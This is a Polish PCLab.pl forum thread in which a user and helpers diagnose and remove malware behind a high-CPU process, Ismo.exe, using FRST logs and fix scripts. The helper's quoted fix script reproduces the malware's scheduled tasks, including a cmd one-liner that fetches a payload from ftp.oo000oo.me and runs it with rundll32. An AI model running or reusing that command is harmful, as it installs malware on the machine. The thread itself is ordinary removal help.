Forum PCLab.pl: Ismo.exe - Wirus - Forum PCLab.pl

Skocz do zawartości

Dodaj obrazek

Otwarty

Ikona Ostatnio dodane tematy

Ikona Najnowsze pliki

Strona 1 z 1
  • Nie możesz rozpocząć nowego tematu
  • Nie możesz odpowiadać w tym temacie

Ismo.exe - Wirus Oceń temat: -----

#1 Użytkownik jest niedostępny   derczy 

  • Dyskutant
  • PipPip
  • Grupa: Forumowicze
  • Postów: 16
  • Dołączył: Wt, 29 Lip 14

Napisany 15 Lipiec 2017 - 11:07

W odpowiedzi do tego wcześniejszego tematu: http://forum.pclab.p...enie-procesora/

FRST:

http://wklej.to/V79eH

Additional:

http://wklej.to/kzaTx

Shortcut:

http://wklej.to/tu3wY

Bardzo proszę o sprawdzenie logów. Z góry dziękuje za pomoc.

#2 Użytkownik jest niedostępny   filutka78 

  • Uzależniony od forum
  • PipPipPipPipPip
  • Grupa: Forumowicze
  • Postów: 16346
  • Dołączył: Pn, 15 Lis 10

Napisany 15 Lipiec 2017 - 11:46

Ism.exe czy Ismo.exe?

1) Uruchom FRST. NA klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

Cytuj

WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION
ShortcutWithArgument: C:\Users\dre\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\dre\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP%
Task: C:\Windows\Tasks\OKLSFNHD1.job => C:\ProgramData\SecurityUtility\SecurityUtility.exe <==== ATTENTION
Task: {101B1901-AB73-49CC-B477-6B1A5C00EEDA} - System32\Tasks\Mysa2 => cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {15D5ED4E-B70C-440A-B44C-06DEFDA652FB} - System32\Tasks\ok => Rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
Task: {1A1A7416-84A5-47CD-BDF8-ACB0F26B5D35} - System32\Tasks\{93AF70E0-4160-4CEF-B68D-1C855933EEF7} => pcalua.exe -a "D:\Torrent\The Sims 3 All In One Edition (Including Into The Future EXP)\The_Sims_3_Into_The_Future-FLT\gra\Sims3EP11Setup.exe" -d "D:\Torrent\The Sims 3 All In One Edition (Including Into The Future EXP)\The_Sims_3_Into_The_Future-FLT\gra"
Task: {6F853B3B-9A51-4BFA-BC21-BAEEA36BF59B} - System32\Tasks\{5A8A834F-002C-4520-8F85-1B1395B5F0D7} => pcalua.exe -a "C:\Program Files (x86)\Nox\bin\Nox_unload.exe"
Task: {7DA0AD55-0AE7-4008-B30F-2814679C4122} - System32\Tasks\Mysa1 => Rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {7ECB69E0-F6B4-4293-B9A6-9BEFC999EBDF} - System32\Tasks\OKLSFNHD1 => C:\ProgramData\SecurityUtility\SecurityUtility.exe <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{2b792007-e155-455b-a1c9-9224ccaaceb5} <==== ATTENTION (Restriction - IP)
CHR HomePage: Default -> hxxp://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBFnkdYvIvvwfEYzwmkwM3HPmqx4h7hT3aQhazFP7JjUpTyI8SQKNWzeqHlWdVD8vkoyOaCe_2Dhp5-7UyKbhIaNrK3pAqyCUL604fVFqxbQ_7AkXar2KhjTsUXYUmB4bo-lNGukSMBEqGsm_chXyqpjCJmWdiaiZu40s5ShCDelYE3PpC1G_s,
S2 WsDrvInst; C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone for Android (CPC)\Library\DriverInstaller\DriverInstall.exe [X]
File: C:\Windows\system32\p
File: C:\Windows\system32\s
File: C:\Windows\system32\0
File: C:\Windows\0
File: C:\Windows\SysWOW64\0
HOSTS:
EmptyTemp:

Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).
Daj z tego raport.

2) Zrób nowe logi FRST.

F.

#3 Użytkownik jest niedostępny   derczy 

  • Dyskutant
  • PipPip
  • Grupa: Forumowicze
  • Postów: 16
  • Dołączył: Wt, 29 Lip 14

Napisany 15 Lipiec 2017 - 13:10

Poniżej raport:

http://wklej.to/2p3l8

FRST:

http://wklej.to/rDwH4

Cytuj

Ism.exe czy Ismo.exe?


Prawdopodobnie Ismo.exe, choć nie jest pewien czym jest Ism.exe. Ale po usunięciu Ismo.exe, jako procesu mój komputer wrócił do normy, a sam ten proces pobierał najwięcej zasobów, tak więc był odpowiedzialny za obciążenie procesora. Nie wiem jak teraz, na razie jest w porządku. Fakt, że problem pojawia się dopiero po jakimś czasie od uruchomienia komputera lub jego pracy. Nie wykluczam, że te procesy mogą być ze sobą powiązane, ale nie mam pojęcia za co on jest odpowiedzialny, także trudno mi to stwierdzić.

Ten post był edytowany przez derczy dnia: 15 Lipiec 2017 - 13:12


#4 Użytkownik jest niedostępny   filutka78 

  • Uzależniony od forum
  • PipPipPipPipPip
  • Grupa: Forumowicze
  • Postów: 16346
  • Dołączył: Pn, 15 Lis 10

Napisany 15 Lipiec 2017 - 14:00

Cytuj

CHR HomePage: Default -> hxxp://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBFnkdYvIvvwfEYzwmkwM3HPmqx4h7hT3aQhazFP7JjUpTyI8SQKNWzeqHlWdVD8vkoyOaCe_2Dhp5-7UyKbhIaNrK3pAqyCUL604fVFqxbQ_7AkXar2KhjTsUXYUmB4bo-lNGukSMBEqGsm_chXyqpjCJmWdiaiZu40s5ShCDelYE3PpC1G_s,

Tego FRST nie jest w stanie zmienić.
Trzeba ręcznie:
Uruchom Google Chrome
> Naciśnij klawisze: lewy Alt+F i kliknij przycisk Ustawienia >
> Sekcja: Po uruchomieniu > wybierz: Otwórz konkretną stronę lub zestaw stron >
> Kliknij: Wybierz strony >
> Usuń: tę dziwną stronę, wpisz nowy adres strony głównej i kliknij przycisk OK.

Na obrazku, w Twoim pierwszym temacie, widoczny jest tylko proces Ism.exe.

Uruchom FRST.
W polu SEARCH (SZUKAJ) wklej:

Cytuj

Ism.exe; Ismo.exe

kliknij na przycisk "Search Files (Szukaj Plików)".
Raport z tego będzie tam, gdzie jest FRST.


F.

#5 Użytkownik jest niedostępny   derczy 

  • Dyskutant
  • PipPip
  • Grupa: Forumowicze
  • Postów: 16
  • Dołączył: Wt, 29 Lip 14

Napisany 15 Lipiec 2017 - 14:15

Nie ma takiej strony w Google Chrome. Za każdym razem otwiera mi się domyślna, podobnej nie widzę w ustawieniach.

Tutaj jest widoczny Ismo.exe. Tak jak wspomniałem, po usunięciu go z tego miejsca, procesor ustabilizował się. Ale pewnie było to tylko jego chwilowe wyłączenie.

Dodaj obrazek

Raport z FRST:

http://wklej.to/H2JpQ

#6 Użytkownik jest niedostępny   derczy 

  • Dyskutant
  • PipPip
  • Grupa: Forumowicze
  • Postów: 16
  • Dołączył: Wt, 29 Lip 14

Napisany 16 Lipiec 2017 - 20:06

Jakieś pomysły? Problem pojawia się w dalszym ciągu. Tutaj jeszcze coś z procesu Ismo, może pomoże.

Dodaj obrazek

PS. Znalazłem problem i usunąłem. Zobaczymy czy to przyniesie rozwiązanie. Skorzystałem Emisoft Emergency KIT, który w kilka sekund znalazł Ismo.exe, a przy okazji jeszcze kilka podobnych wirusów oraz trojanów. :mad2:

Dodaj obrazek

Tego Malwarebytes to sobie mogę chyba w dupę wsadzić, który skanował, skanował i nic nie znalazł. Odinstalowuje i pozostawiam Emisoft, polecam.

Ten post był edytowany przez derczy dnia: 16 Lipiec 2017 - 20:21


#7 Użytkownik jest niedostępny   toska78 

  • Uzależniony od forum
  • PipPipPipPipPip
  • Grupa: Forumowicze
  • Postów: 1342
  • Dołączył: Cz, 24 Lis 11

Napisany 16 Lipiec 2017 - 20:17

Sprawdź plik procesu na virustotal Mój link. Prawym myszki na proces i wybierz "Otwórz lokalizację pliku" żeby go zlokalizować na partycji C:.

#8 Użytkownik jest niedostępny   derczy 

  • Dyskutant
  • PipPip
  • Grupa: Forumowicze
  • Postów: 16
  • Dołączył: Wt, 29 Lip 14

Napisany 17 Lipiec 2017 - 10:54

Problem jest taki, że w katalogu ani procesach go nie ma. Widoczny jest jedynie w "Monitorach zasobu", a tam nie ma takiej opcji. Po kwarantannie usunąłem go, ale teraz został znów wykryty i ponownie dodany do kwarantanny. Pojawia się najwyraźniej po każdym uruchomieniu komputera, więc problem musi być gdzieś głębiej.

#9 Użytkownik jest niedostępny   derczy 

  • Dyskutant
  • PipPip
  • Grupa: Forumowicze
  • Postów: 16
  • Dołączył: Wt, 29 Lip 14

Napisany 17 Lipiec 2017 - 22:59

Analiza pliku Ismo.exe: https://www.virustot...dcaee/analysis/

Jak usunąć to gówno? Ma ktoś jeszcze jakieś pomysły?

Ten post był edytowany przez derczy dnia: 17 Lipiec 2017 - 22:59


Strona 1 z 1
  • Nie możesz rozpocząć nowego tematu
  • Nie możesz odpowiadać w tym temacie

1 Użytkowników czyta ten temat
0 użytkowników, 1 gości, 0 anonimowych